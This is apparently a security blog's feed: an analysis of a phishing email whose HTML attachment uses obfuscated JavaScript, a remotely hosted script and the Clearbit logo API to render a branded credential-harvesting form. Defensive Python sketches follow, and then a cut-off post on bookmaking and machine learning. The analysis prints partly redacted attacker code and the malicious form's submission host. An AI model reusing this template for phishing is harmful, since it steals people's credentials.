/static/8c45dd4b21e3cb60913a18a4dc232ef1/1c72d/email.jpg 590w,
/static/8c45dd4b21e3cb60913a18a4dc232ef1/a8a14/email.jpg 885w,
/static/8c45dd4b21e3cb60913a18a4dc232ef1/6a068/email.jpg 960w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The first thing to note about this phishing email is the use of the accented é in the subject line to circumvent mail filters that use keywords such as “Overdue” and “Invoice” to stop phishing emails from landing in user inboxes. This is a fairly crude and easy-to-notice tactic, and most of the mailboxes we tested correctly labelled this email as spam. However, there were exceptions, so it is important to check that homoglyphs and unusual character variations are covered by any keyword filtering.&lt;/p&gt;
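&lt;p&gt;One way to make keyword filtering resilient to this trick is to compare a simplified “skeleton” of the subject line rather than the raw text. The Python sketch below uses Unicode NFKD normalisation to strip accents (so “Overdué” becomes “overdue”) and a small lookup table for cross-script lookalikes such as the Cyrillic “о”. The table is a hypothetical sample only; a production filter would need a far larger mapping, such as the confusables data published alongside Unicode Technical Standard #39.&lt;/p&gt;

```python
import unicodedata

# Hypothetical sample of cross-script lookalikes (Cyrillic to Latin).
# NFKD normalisation does not map these, so they need an explicit table.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o",
    "\u0440": "p", "\u0441": "c", "\u0456": "i",
}


def skeleton(text):
    """Strip diacritics, case-fold, then map known lookalikes for comparison."""
    decomposed = unicodedata.normalize("NFKD", text)
    without_marks = "".join(ch for ch in decomposed if not unicodedata.combining(ch))
    return "".join(CONFUSABLES.get(ch, ch) for ch in without_marks.casefold())


def matched_keywords(subject, keywords):
    """Return the blocked keywords found in the subject once both are normalised."""
    folded = skeleton(subject)
    return sorted(keyword for keyword in keywords if skeleton(keyword) in folded)


if __name__ == "__main__":
    subject = "Overdué invoicé - TransPérfect - Invoicé"
    print(matched_keywords(subject, {"overdue", "invoice"}))  # ['invoice', 'overdue']
```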
&lt;p&gt;There wasn’t much more to glean from the email, but an analysis of the sender domain and email headers suggests that the email was sent from a compromised mailbox in Estonia.&lt;/p&gt;
&lt;p&gt;TransPerfect has been a common subject of phishing emails over the past few years. The company suffered a data breach in 2017, when employee information was compromised in a phishing attack.&lt;/p&gt;
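&lt;p&gt;The attachment name is another cheap signal worth checking: csriskmanagement-997072_xls.html mentions a spreadsheet format but will open in a browser. The Python sketch below flags attachments whose real extension can render or execute content while the rest of the name hints at a document type. Both extension lists are illustrative assumptions rather than a complete policy.&lt;/p&gt;

```python
import os
import re

# Illustrative lists only: extensions that render or run when opened, and
# document types an attacker might imitate in the file name.
ACTIVE_EXTENSIONS = {".htm", ".html", ".hta", ".js", ".vbs", ".exe", ".scr"}
DOCUMENT_HINTS = {"xls", "xlsx", "doc", "docx", "pdf", "csv"}


def is_deceptive_attachment(filename):
    """True when an active file type is named to look like a document."""
    stem, extension = os.path.splitext(filename.lower())
    if extension not in ACTIVE_EXTENSIONS:
        return False
    # Split names such as "report-123_xls" or "invoice.pdf" into word-like chunks
    chunks = re.split(r"[._\-\s]+", stem)
    return any(chunk in DOCUMENT_HINTS for chunk in chunks)


if __name__ == "__main__":
    for name in ("csriskmanagement-997072_xls.html", "invoice.pdf.exe", "report.xlsx", "index.html"):
        print(name, is_deceptive_attachment(name))
```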
&lt;h2&gt;The HTML Attachment&lt;/h2&gt;
&lt;p&gt;On opening the file in a text editor, there were two sections of JavaScript which looked suspicious.&lt;/p&gt;
&lt;h3&gt;Section 1&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;var vsebz=[876 character alphanumeric string];
// Percent-decode with unescape(), base64-decode with atob(), then write the result into the page
document.write(atob(unescape(vsebz)));&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If it is not apparent what is occurring in this section: vsebz is a long-ish, twice-obfuscated string that is decoded by unescape() and atob() and then passed to the document.write() method, so that your browser renders the result.&lt;/p&gt;
&lt;p&gt;In this instance it is fairly easy to decode the string, once using a base64 decoder and then with a subsequent XML decoder. The resulting unobfuscated string points to a snippet of further code hosted at yourjavascript.com:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;http://yourjavascript.com/[11 character numeric string]/[9 character numeric string].js&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
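&lt;p&gt;Decoding this kind of payload is safer done outside the browser, so that nothing is written into a live page. The Python sketch below reproduces atob(unescape(...)) in the same order as the script (percent-decoding first, then base64) and can then pull out any URLs. It is an approximation: Python’s unquote() handles %XX escapes but not the legacy %uXXXX form that JavaScript’s unescape() also accepts, and the URL pattern is a simple assumption rather than a full parser.&lt;/p&gt;

```python
import base64
import re
from urllib.parse import unquote

# Simple pattern for http(s) URLs that stop at whitespace or quotes
URL_PATTERN = re.compile(r"https?://[^\s\"']+")


def decode_payload(obfuscated):
    """Mirror JavaScript's atob(unescape(s)) without executing anything."""
    # unescape(): reverse %XX escapes, treating each as a single byte (Latin-1)
    percent_decoded = unquote(obfuscated, encoding="latin-1")
    # atob(): base64-decode to a "binary string" with one character per byte
    return base64.b64decode(percent_decoded).decode("latin-1")


def extract_urls(text):
    """Return every http(s) URL found in the decoded text."""
    return URL_PATTERN.findall(text)


if __name__ == "__main__":
    sample = "aGk%3D"  # hypothetical input: base64 "aGk=" for "hi", with "=" percent-encoded
    print(decode_payload(sample))  # hi
```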
&lt;p&gt;This link contained further obfuscated JavaScript revealing two more document.write() calls. One downloaded an image hosted by the attacker on imgbb, and the other pointed to a separate yourjavascript.com page containing the HTML that would have been rendered had we opened the attachment on our desktop.&lt;/p&gt;
&lt;p&gt;Interestingly, the image may reveal some information about the attacker, as it appears to be a screenshot taken from the attacker’s desktop. The foreground is a blurred spreadsheet designed to encourage a victim to enter credentials, as you will see in the complete screenshot below. The Excel user appears to be an individual called “Moshe”, which matches the initial in the Outlook client in the background. At the very bottom of the image there is also evidence of correspondence with another user, “Lea”. Manual OSINT didn’t uncover anything helpful, but perhaps a tool that scours social media for relationships between those two forenames could produce a shortlist of potential threat actors.&lt;/p&gt;
&lt;p&gt;The image was reported to imgbb and taken down shortly afterwards, so an “image not found” background now appears in the browser when the attachment is opened. Hopefully this has made the attack easily identifiable as phishing for users who have a similar email sitting in their inbox.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/bb0af62c9919d8e3476ff0ade724c0bd/f3712/screenshot.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 51.35135135135135%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAKABQDASIAAhEBAxEB/8QAGAAAAwEBAAAAAAAAAAAAAAAAAAECAwT/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB5aSjQgr/xAAZEAABBQAAAAAAAAAAAAAAAAAQAAERITH/2gAIAQEAAQUCgUmwf//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8BP//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8BP//EABgQAAIDAAAAAAAAAAAAAAAAAAAQAREx/9oACAEBAAY/Allkv//EABoQAQADAAMAAAAAAAAAAAAAAAEAETEQIaH/2gAIAQEAAT8hBWErCuiFdMeThn//2gAMAwEAAgADAAAAEIsP/8QAFREBAQAAAAAAAAAAAAAAAAAAEBH/2gAIAQMBAT8Qh//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8QP//EABwQAQADAAIDAAAAAAAAAAAAAAEAESFBUTGx0f/aAAgBAQABPxCm5q5ZSkFmHUQ0t3deok0d+ILmsTfln//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Screenshot&quot;
        title=&quot;Screenshot&quot;
        src=&quot;/static/bb0af62c9919d8e3476ff0ade724c0bd/1c72d/screenshot.jpg&quot;
        srcset=&quot;/static/bb0af62c9919d8e3476ff0ade724c0bd/a80bd/screenshot.jpg 148w,
/static/bb0af62c9919d8e3476ff0ade724c0bd/1c91a/screenshot.jpg 295w,
/static/bb0af62c9919d8e3476ff0ade724c0bd/1c72d/screenshot.jpg 590w,
/static/bb0af62c9919d8e3476ff0ade724c0bd/f3712/screenshot.jpg 744w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;An analysis of the accompanying HTML on the second yourjavascript.com page shows that the page calls myFunction() when it loads and contains a form with a placeholder for a password. When the user submits the form, its contents are sent in an HTTP POST request to a malicious server. As of 17/11/2020, VirusTotal flags the URL as both phishing and malware using the CyRadar, Fortinet, Sophos and Kaspersky engines.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;... onload=&amp;quot;myFunction()&amp;quot; ...
... action=&amp;quot;http://www.tanikawashuntaro.com//cgi-bin/[alphanumeric string]/[alphanumeric string].php?[alphanumeric string]&amp;quot; method=&amp;quot;post&amp;quot; enctype=&amp;quot;multipart/form-data&amp;quot; ...&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
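&lt;p&gt;When triaging a suspicious HTML page or attachment, it can help to list every form that asks for a password, along with where it submits, without opening the page in a browser. The sketch below uses Python’s standard html.parser module. It only sees markup present in the text it is given, so content injected at runtime by document.write() (as in this sample) would need to be decoded first; attributing each input to the most recently opened form is a simplifying assumption.&lt;/p&gt;

```python
from html.parser import HTMLParser


class FormActionExtractor(HTMLParser):
    """Record each form's action and method, and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "form":
            self.forms.append({
                "action": attributes.get("action"),
                "method": (attributes.get("method") or "get").lower(),
                "has_password": False,
            })
        elif tag == "input" and self.forms:
            # Attribute the field to the most recently opened form
            if (attributes.get("type") or "").lower() == "password":
                self.forms[-1]["has_password"] = True


def credential_forms(html_text):
    """Return the forms in `html_text` that collect a password."""
    parser = FormActionExtractor()
    parser.feed(html_text)
    parser.close()
    return [form for form in parser.forms if form["has_password"]]
```

&lt;p&gt;Run against the decoded HTML from the second yourjavascript.com page, a check like this would be expected to surface the POST form pointing at the malicious server, provided its password field is marked up as a password input.&lt;/p&gt;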
&lt;p&gt;myFunction() is defined in section 2 of the original csriskmanagement-997072_xls.html file.&lt;/p&gt;
&lt;h3&gt;Section 2&lt;/h3&gt;
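&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;function myFunction() {
  // Both values are base64 encoded to hide them from casual inspection
  var ml = [base64 encoded string];   // decodes to the target email address
  var logi = [base64 encoded string]; // decodes to the URL of the target company logo
  var ulb = atob(logi);
  var go = atob(ml);
  // Brand the page with the logo of the target company
  document.getElementById(&amp;#39;mypic&amp;#39;).setAttribute(&amp;#39;src&amp;#39;, ulb);
  // Display the email address and copy it into the myvalue element
  document.getElementById(&amp;quot;myText&amp;quot;).innerHTML = go;
  document.getElementById(&amp;#39;myvalue&amp;#39;).value = go;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;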
&lt;p&gt;myFunction() is primarily used to brand the form and capture credentials that are typed into the form mentioned in section 1. You can see the full rendering of the form and the background image below.&lt;/p&gt;
&lt;p&gt;Within this function the JavaScript variables are further obfuscated. In this instance the ml variable decodes to the string “info@csriskmanagement.co.uk”. The logi variable is slightly more interesting, as it decodes to a URL that abuses a legitimate marketing API from clearbit.com. The API retrieves a company’s logo given the company’s domain:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;https://logo.clearbit.com/csriskmanagement.co.uk&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Using the above template a malicious attacker could create many branded, self-contained credential stealers by only changing a domain variable. A fully rendered image of the CS Risk Management credential stealer is below.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3e153d35051f9e74a1487ed6a1c78f9a/a65aa/logo.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 45.27027027027027%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAJABQDASIAAhEBAxEB/8QAGAAAAwEBAAAAAAAAAAAAAAAAAAEEAgP/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB4VwuNiK//8QAGBAAAwEBAAAAAAAAAAAAAAAAAQIDEiD/2gAIAQEAAQUCUDVkko4//8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAwEBPwE//8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAgEBPwE//8QAGRAAAQUAAAAAAAAAAAAAAAAAAQAREiAx/9oACAEBAAY/Ag6ENr//xAAYEAEBAQEBAAAAAAAAAAAAAAABERAAUf/aAAgBAQABPyFAAil5KY17dM//2gAMAwEAAgADAAAAEAjP/8QAFREBAQAAAAAAAAAAAAAAAAAAEBH/2gAIAQMBAT8Qh//EABURAQEAAAAAAAAAAAAAAAAAABAR/9oACAECAQE/EKf/xAAaEAEAAwEBAQAAAAAAAAAAAAABABEhMRBB/9oACAEBAAE/EB1SklZezNFrRxTMPqx7Ojz/2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Logo&quot;
        title=&quot;Logo&quot;
        src=&quot;/static/3e153d35051f9e74a1487ed6a1c78f9a/1c72d/logo.jpg&quot;
        srcset=&quot;/static/3e153d35051f9e74a1487ed6a1c78f9a/a80bd/logo.jpg 148w,
/static/3e153d35051f9e74a1487ed6a1c78f9a/1c91a/logo.jpg 295w,
/static/3e153d35051f9e74a1487ed6a1c78f9a/1c72d/logo.jpg 590w,
/static/3e153d35051f9e74a1487ed6a1c78f9a/a8a14/logo.jpg 885w,
/static/3e153d35051f9e74a1487ed6a1c78f9a/a65aa/logo.jpg 1048w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We informed Clearbit of our findings and recommended that the API require authentication and apply appropriate rate limiting to help prevent abuse. We also recommended ongoing monitoring of accounts so that Clearbit could identify accounts that may be abusing the service for nefarious purposes.&lt;/p&gt;
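&lt;p&gt;Rate limiting of the kind recommended above is often implemented as a token bucket per API key or client. The sketch below is a minimal in-memory illustration in Python. It is not anything Clearbit is known to run; the class name, the capacity and refill values and the per-key dictionary are all hypothetical choices made for the example.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import time


class TokenBucket:
    """Minimal in-memory token bucket: allows bursts of up to `capacity`
    requests, then refills at `refill_rate` tokens per second."""

    def __init__(self, capacity, refill_rate, clock=time.monotonic):
        self.capacity = capacity
        self.refill_rate = refill_rate
        self.clock = clock  # injectable clock so the limiter can be tested
        self.tokens = float(capacity)
        self.last = clock()

    def allow(self):
        """Return True if a request may proceed, consuming one token."""
        now = self.clock()
        # Add the tokens earned since the last call, capped at capacity
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.refill_rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False


# Hypothetical: one bucket per API key, held in process memory
buckets = {}


def check_request(api_key, capacity=10, refill_rate=1.0):
    """Return True if this API key is still within its rate limit."""
    if api_key not in buckets:
        buckets[api_key] = TokenBucket(capacity, refill_rate)
    return buckets[api_key].allow()&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A bucket allows short bursts up to its capacity and then throttles a client to the refill rate. In a real deployment, the counters would usually live in shared storage rather than process memory, so that every server enforces the same limit.&lt;/p&gt;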
&lt;p&gt;These measures may help prevent Clearbit’s API from being abused by malicious attackers, but it is unlikely that the security community will be able to prevent the programmatic capture of company logos altogether. Once an email has bypassed technical protections, appropriate security training that highlights social engineering tactics is the best defence.&lt;/p&gt;
&lt;h2&gt;Recommendations&lt;/h2&gt;
&lt;p&gt;This report doesn’t describe a new attack, but it highlights some security tips that we can all implement if we aren’t doing so already.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ensure your mail filtering solution is capable of handling homoglyphs&lt;/li&gt;
&lt;li&gt;Be wary of file extensions when viewing attachments&lt;/li&gt;
&lt;li&gt;Review which attachment types can be received by e-mail and restrict any that the business doesn’t need&lt;/li&gt;
&lt;li&gt;Be mindful when sharing screenshots and video, as sensitive information may be visible in the background&lt;/li&gt;
&lt;li&gt;If your organisation hosts an unauthenticated API or service then ensure you conduct routine audits to check for abuse&lt;/li&gt;
&lt;li&gt;Conduct routine security awareness training&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Mike Tyson and Machine Learning]]></title><description><![CDATA[Machine Learning in Bookmaking Bookmakers have been using machine learning to manage their risks and set odds for sporting events but they…]]></description><link>https://dfworks.com/blog/mike_tyson_machine_learning/</link><guid isPermaLink="false">https://dfworks.com/blog/mike_tyson_machine_learning/</guid><pubDate>Sun, 20 Jan 2019 12:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Machine Learning in Bookmaking&lt;/h2&gt;
&lt;p&gt;Bookmakers have been using machine learning to manage risk and set odds for sporting events, but they have far more factors to consider than their customers do. Bookmakers must set their prices based not only on the probable outcome of a sporting event but also on how much money is being placed across a range of different bets, while also pricing competitively relative to other bookmakers.&lt;/p&gt;
&lt;p&gt;These decisions often have to be made incredibly quickly, and with the increased use of automation the process can be comparable to other types of financial trading. An interesting example of how quickly bookmakers react to changes in market conditions came when I received an (incorrect!) tip on the next Crystal Palace F.C. manager. In June 2017, after Sam Allardyce’s departure, the odds on Slaviša Jokanović getting the position were 33/1.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/47311/slavisa.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 62.16216216216216%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAMABQDASIAAhEBAxEB/8QAFwABAAMAAAAAAAAAAAAAAAAAAAECBf/EABQBAQAAAAAAAAAAAAAAAAAAAAD/2gAMAwEAAhADEAAAAduwED//xAAXEAADAQAAAAAAAAAAAAAAAAAAEBFB/9oACAEBAAEFAtVKv//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8BP//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8BP//EABYQAAMAAAAAAAAAAAAAAAAAAAAgMf/aAAgBAQAGPwIq/wD/xAAaEAACAgMAAAAAAAAAAAAAAAAAARExEFFx/9oACAEBAAE/IYeyXRVFh5Gz/9oADAMBAAIAAwAAABCAD//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8QP//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8QP//EABsQAQADAQADAAAAAAAAAAAAAAEAETEhQVGR/9oACAEBAAE/EFdUTuPk5QssXssULbWwQGS3oir4n//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Slavisa&quot;
        title=&quot;Slavisa&quot;
        src=&quot;/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/1c72d/slavisa.jpg&quot;
        srcset=&quot;/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/a80bd/slavisa.jpg 148w,
/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/1c91a/slavisa.jpg 295w,
/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/1c72d/slavisa.jpg 590w,
/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/a8a14/slavisa.jpg 885w,
/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/47311/slavisa.jpg 1080w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Because this was a relatively low volume market, a dozen bets from a handful of people caused the odds to drop to 9/1 in the space of about 30 minutes.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ab2bc3d84c5a88fe34ae65c71d641781/47311/odds.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 47.972972972972975%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAKABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAEFAv/EABUBAQEAAAAAAAAAAAAAAAAAAAAC/9oADAMBAAIQAxAAAAHbtK5jFsP/xAAYEAADAQEAAAAAAAAAAAAAAAAAARQCIP/aAAgBAQABBQKRkTZFrj//xAAWEQADAAAAAAAAAAAAAAAAAAAAARL/2gAIAQMBAT8BlEo//8QAFhEAAwAAAAAAAAAAAAAAAAAAAAIT/9oACAECAQE/AaMUY//EABkQAAMAAwAAAAAAAAAAAAAAAAABMgIgkf/aAAgBAQAGPwK8S0Wuaf/EABsQAAICAwEAAAAAAAAAAAAAAAABIVEQEZFB/9oACAEBAAE/IYp4Hi4jBNKkaVY//9oADAMBAAIAAwAAABCLL//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8QC//EABURAQEAAAAAAAAAAAAAAAAAAABh/9oACAECAQE/EKKP/8QAHxABAAIBAwUAAAAAAAAAAAAAAQARIRAxUXGRocHh/9oACAEBAAE/EMADZd2z5hwPvSfcU5PoifGRIwO2n//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Odds&quot;
        title=&quot;Odds&quot;
        src=&quot;/static/ab2bc3d84c5a88fe34ae65c71d641781/1c72d/odds.jpg&quot;
        srcset=&quot;/static/ab2bc3d84c5a88fe34ae65c71d641781/a80bd/odds.jpg 148w,
/static/ab2bc3d84c5a88fe34ae65c71d641781/1c91a/odds.jpg 295w,
/static/ab2bc3d84c5a88fe34ae65c71d641781/1c72d/odds.jpg 590w,
/static/ab2bc3d84c5a88fe34ae65c71d641781/a8a14/odds.jpg 885w,
/static/ab2bc3d84c5a88fe34ae65c71d641781/47311/odds.jpg 1080w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Interestingly, some betting sites where no bets had been placed also adjusted their prices on that market, while others didn’t respond at all. This demonstrates that some bookmakers adjust prices based on customer sentiment and competitors rather than on factors that are causal in the outcome of a sporting event. This is a necessity for bookmakers: bets on Jokanović were a liability that wasn’t balanced on their book. The twittersphere also noticed the tumble in price!&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/422a5853b0ce018adab8a13a8a44fc3b/47311/twitter.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 135.13513513513513%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAbABQDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAMCAQX/xAAUAQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIQAxAAAAH1a7HQSrPRoH//xAAYEAADAQEAAAAAAAAAAAAAAAAAAQIQEf/aAAgBAQABBQKXLOrGcEK5vaOZ/8QAFBEBAAAAAAAAAAAAAAAAAAAAIP/aAAgBAwEBPwEf/8QAFBEBAAAAAAAAAAAAAAAAAAAAIP/aAAgBAgEBPwEf/8QAGRAAAgMBAAAAAAAAAAAAAAAAASECESBh/9oACAEBAAY/AjUSHpWua//EAB0QAAIDAAIDAAAAAAAAAAAAAAABESFBEDFxgZH/2gAIAQEAAT8h3kJyzyC6rj6/DoTmiLgJkCJYJYVCUI//2gAMAwEAAgADAAAAEMAPPP/EABQRAQAAAAAAAAAAAAAAAAAAACD/2gAIAQMBAT8QH//EABQRAQAAAAAAAAAAAAAAAAAAACD/2gAIAQIBAT8QH//EAB4QAQEBAAEEAwAAAAAAAAAAAAERACExQVFhcZGh/9oACAEBAAE/EDnICzkHr7wMYe3XchyTy4dHi+y75fRqIv5mT3BTl6pzgQjcQZggKNhrbw84oBDf/9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Tweet&quot;
        title=&quot;Tweet&quot;
        src=&quot;/static/422a5853b0ce018adab8a13a8a44fc3b/1c72d/twitter.jpg&quot;
        srcset=&quot;/static/422a5853b0ce018adab8a13a8a44fc3b/a80bd/twitter.jpg 148w,
/static/422a5853b0ce018adab8a13a8a44fc3b/1c91a/twitter.jpg 295w,
